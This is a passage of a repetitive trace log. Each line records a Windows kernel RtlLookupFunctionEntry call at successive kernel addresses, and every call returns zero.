| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce19d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce19e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce19f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1a00, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1a10, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1a20, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1a30, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1a40, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1a50, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1a60, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1a70, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1a80, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1a90, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1aa0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1ab0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1ac0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1ad0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1ae0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1af0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1b00, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1b10, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1b20, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1b30, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1b40, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1b50, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1b60, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1b70, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1b80, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1b90, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1ba0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1bb0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1bc0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1bd0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1be0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1bf0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1c00, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1c10, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1c20, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1c30, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1c40, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1c50, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1c60, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1c70, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1c80, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1c90, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1ca0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1cb0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1cc0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1cd0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1ce0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1cf0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1d00, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1d10, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1d20, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1d30, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1d40, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1d50, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1d60, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1d70, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1d80, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1d90, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1da0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1db0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1dc0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1dd0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1de0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1df0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1e00, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1e10, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1e20, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1e30, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1e40, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1e50, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1e60, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1e70, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1e80, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1e90, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1ea0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1eb0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1ec0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1ed0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1ee0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1ef0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1f00, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1f10, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1f20, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1f30, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1f40, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1f50, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1f60, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1f70, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1f80, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1f90, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1fa0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1fb0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1fc0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1fd0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1fe0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce1ff0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2000, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2010, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2020, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2030, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2040, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2050, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2060, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2070, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2080, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2090, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce20a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce20b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce20c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce20d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce20e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce20f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2100, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2110, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2120, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2130, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2140, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2150, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2160, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2170, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2180, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2190, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce21a0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce21b0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce21c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce21d0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce21e0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce21f0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2200, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2210, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2220, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2230, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2240, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce2250, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
